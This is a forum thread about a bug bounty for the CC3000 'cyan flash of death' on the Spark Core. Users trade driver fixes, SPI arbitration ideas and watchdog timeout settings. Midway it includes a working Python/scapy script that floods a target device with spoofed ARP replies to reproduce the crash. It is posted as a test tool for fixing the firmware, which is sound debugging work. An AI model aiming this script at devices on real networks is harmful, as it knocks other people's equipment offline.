Bug bounty: Kill the 'Cyan flash of death'

I actually did try it with a modified IP range that excluded both the router’s ip and the spark core’s IP to make sure I wasn’t interfering with anything that could cause problems otherwise. It still fails. One thing I notice is that if I send 4 ARP packets in a row, the cc3000 can handle it. If I start throwing more at it than that, it pukes. I wonder if putting a delay inbetween each ARP packet would give the cc3000 enough time to process them without problems.

I’m not very strong in python, and I need to get off the computer for the night, so if anyone else wants to play with it, I’d love to hear the results.

2 Likes

Latest uptime 119152335 / 1000 / 60 / 60 = 33.09 hours :smiley:

It breaks my CC3000 EVM hooked to the RF ports of my MSP430 FraunchPad with the Energia drivers/firmware and the same CC3000 EVM with TI's latest firmware and demo app hooked to a Tiva C LaunchPad via the Sensor Booster Pack.

So there's ARP issues going on for sure!

@Hypnopompia Thank you for the tool!

@wtfuzz @BDub @zachary

Some good news. I tested https://github.com/davids5/spark-* at master + wan_watchdogs + tcp_server_fix and it recovers from the ARP flood in 25 seconds.

2 Likes

@pra Nice analysis!
Below is how the reworked CC3000 code handles the issues:

Buffer sizes

New Driver:
Send Side:May cause more then one TCP packet or not depending on the TI policy for holding a packet before sending.
Receive Side, the driver has a SPARK_ASSERT(data_to_recv <= arraySize(wlan_rx_buffer)); that will panic (send SOS on red LED then AssertionFailure ( 10 blinks) code ) if it ever happens. Never seen one :smile:

Endless Loops in CC3000_Spi

There were all kinds of wrong edge detection and races.

All this has been reworked to support the TI IRQ requirements. With read request preemption on a host write. The race to the cc3000 with an unsolicited event v. a Host write. Once the driver is in the idle state, Writes are committed with an atomic CS assertion.

Potential Endless Loop in Evnt_handler

New driver has a timeout mechanism on the even handler. With return to the application with failure codes as per the socket.h API (alal BSD sockets API well almost ;( )

Probable Missed Interrupts

This has been reworked. The DMA is streamlined. The WIF_INT assertion schedules the DMA. On completion of the DMA the buffer is dropped off for consumption by the unsolicited event handler with only the WIF_INT masked. If the unsolicited event handler consume the packet WIF_INT ints are unmasked (the NVIC will assert a CPU IRQ if there was/are a falling edge on the WIF_INT while masked). If it does not the assumption is it was a solicited IRQ as a result of a write. The code handles that as well. None of the WIF_INT masking is an issue because the CC3000 has no queueing, there can be only one outstanding request at a time.

I have posted a pdf of the issues and fixes reported to spark that i made.

http://nscdg.com/spark/David_Sidrane's_rework_of_the_TI_CC3000_driver_for_Spark.pdf

Aloha,

David

3 Likes

I’m really excited about this script, can’t wait to try this here in captivity. :slight_smile:

Edit: Also, I love checking this thread in the morning.

2 Likes

In the rewritten driver is there consideration for the SPI being shared with the serial flash? Looking at your cc3000_spi.c, the EXTI handler can initiate the SPI DMA immediately. If the user code is in the middle of a read/write operation to the slfash when WIFI_INT triggers, the DMA would need to be held off until the slfash operation completes.

In the baseline spark-core software I suspect this will cause problems with OTA update when packets of the new firmware are written to the sflash before restarting into the bootloader to write back to the STM32 flash.

edit: One solution is for the slfash driver be masking off WIFI_INT before asserting the sflash CS. Likewise the slfash code is not checking for the SPI responding to a CC3000 unsolicited event. I have not taken a deep dive in the CC3000 driver to the level you have, though I suspect there are slfash/CC3000 bus sharing issues lurking here.

Excellent point. We will need arbitration. The CC3000 driver has a SpiPause/Resume that mask/unmask the interrupts. We can create a single point of arbitration. LOCK(&spi) UNLOCK(&spi) sort for deal… Skype me to discuss david_s5

Your Python script looks great for testing. Any chance this is easy to convert to Node.js? I have a lot more fun with Node than Python :wink:

#! /usr/bin/env python

# on Ubuntu:
# sudo apt-get install python-scapy

# You'll need to run this script as root to send these ARP packets

from scapy.all import *

victim = '192.168.1.131' # ip address of CC3000
subnet = '192.168.1'
for i in range(2,255): # assumes your gateway is .1 - skip it so we don't break the ARP cache for the router
	a = ARP()
	a.op = 2
	a.psrc = '%s.%s' % (subnet, i)
	a.pdst = victim
	a.hwdst = 'FF:FF:FF:FF:FF:%0.2X' % (i)
	a.display()
	send(a)

I would have rather written it in node if I could have. I couldn’t find any low level libraries to deal with ARP other than just reading it. It would probably take some c coding to create a node module on top of just writing the node script.

Thanks for that - forwarded to TI.
I’m on the road at present, and cannot run it and grab the debug logs personally for another ~36 hours.

Regardless of any other behaviour, we need the CC3000 to be more robust in the face of arp attacks/strangeness, that is non-negotiable.

1 Like

@zachary @zach I just submitted 2 pull request that will stabilize the master repos.
The tcp WAIT_CLOSE was not working correctly - it has been reworked to use the CC3000 driver’s socket state. Also all the redundant timers have been removed in favor CC3000 event handler supporting timeouts from my last PRs.

I also fixed what I think may have been a clasic hardware watch dog misuse: kicking the dog in the ISR?

Yep. I'm going to check out your code in a sec because I've also been writing code to correct the watchdog.

EDIT: Ok I see you are kicking the dog at the top of the main() loop. But the reload timer is still 3 seconds. This is bad because it will not allow user code to block for more than 3 seconds. Also, if the code gets stuck in some kind of OFFLINE mode, it will constantly loop in the main() loop keeping the system alive.

It's also very hard to tell how all of the other software timers you've implemented are working together with the IWDG watchdog... have you sketched out any kind of flow chart or timing diagram for all of these timeouts and loops? If not I think it's going to be very hard to know what various outcomes will be based on hypothetical blocking of user code or long delays in connecting to the internet/wlan. Personally I have not done this myself either, because I just haven't dived into all of the background code yet.

Please see our discussion here about the watchdog timer and my code that is currently being tested:

I believe its sufficient for when the slfash begins writing on the SPI to 1) check if the DMA is in progress, busy wait until the DMA is complete and 2) instead of starting the DMA in the interrupt handler, update the CC3000 state so that the DMA is started on the next periodic call to the CC3000 driver (add a wlan_tick()).

The solicited responses are driven by a wlan API call which are all blocking, is this correct? Currently the slfash SPI routines are all blocking, polled IO to the peripheral.

I have fairly limited time to look at this over the next few weeks but will take a look at your changes on master once they settle, or if you would like to suggest an implementation I can make the required changes to sflash.

I am open for a discussion when you have time, but here is my thinking at this point...

Yes but there can be and are unsolicited responses while in the busy wait.

Since we want want both subsystems to be as fast as they can be with the least interactions. I would prefer not to use a wlan_tick.

I think that staying above the HW for arbitration will be cleaner. The CC3000 already has to deal with Host write vrs CC3000 unsolicited request. So it has arbitration built in, I think we should add an API and enhance the arbitrator as opposed to splitting the IRQ to DMA in the driver and looking at DMA or SPI hardware directly. The benefit of the decoupling will be portability and the ability to use DMA other peripherals without effects.

@BDub

Good points! What is the max we should allow a loop to run?

The network timeouts for operations default to 20 Sec. But the timeout is kicked down to 8 sec for sparkprotocol and internet test connect operations

So what I moved is a problem (unless the WD and run and 30 Sec)- my bad. What is the max the IWD can we set it to?

All the timeouts cause the errors to bubble up and the main loop/sparkprotocol will fail and cause the cc3000 to be only be rest.

The timers i have added are (including the yet to be merged PRs)

The CC3000 calls to “Read” the results of a command" “network timeouts” 20 Sec default but can be saved/changed and restored.

The CC3000 calls to send when a buffer ins not available. Same timeout: “network timeouts” 20 Sec default but can be saved/changed and restored.

once bubbled up the failures are counted: A reset the CC3000 if the connect to the cloud and the test to the internet fails cfod_count.

There is a SW WD timer that times WIFI connect to the spark has an ADDRESS (dhcp or static)
The a SW WD timer that times WIFI dissconnect to WIFI connect.

if there are timeouts the CC3000 is reset.

So I ran the arp python script, and it causes no problems in my test setup, and I’m not really sure why it would now that I look at it closely, it just broadcasts a bunch of spurious arps. I’m going to re-write to spoof arp requests of the core and see if that tips it over instead.

Modifying the python arp script to flood the CC3000 with arp requests does not appear to have any material impact either.

It might depend on your network. It’s knocking my Core offline along with my MSP430 and Tiva C’s with a CC3000 Evaluation Module.

Ok the max IWDG can be is 26.208 seconds with the Prescaler set to 256 and the Reload value set to 0x0FFF.

I think the IWDG should be set higher than all of the other SW timeouts, only if those software timeouts result in calling NVIC_SystemReset(); that is the only thing besides IWDG that can get the system out of a stuck state.

So if you are telling me that all of the SW timeouts you have implemented are set to about 20 seconds, I think that works out well. However it only gives the Core 20 seconds to connect to WLAN and/or connect to the CLOUD and/or perform the HANDSHAKE… I guess this seems like enough time… and if not, a reset gives it 20 more seconds! lol.

The other case to question is the SmartConfig which can take a long time to complete… so maybe the watchdog would need to be kicked in that loop a couple times. It’s a special mode anyway, and as long as that BLUE led is blinking… the interrupts are still working and a counter can be running to ultimately timeout after something like 2 minutes? If the SmartConfig loop locked for some reason, a solid blue LED or blank LED would likely indicate to the user they need to reset, but the IWDG would also kick in under those conditions.

I think we should let the user code run up to 26.208 seconds… unless they want to kick the watchdog, AND kick the WLAN loop from their code, then they can run as long as they want… I think.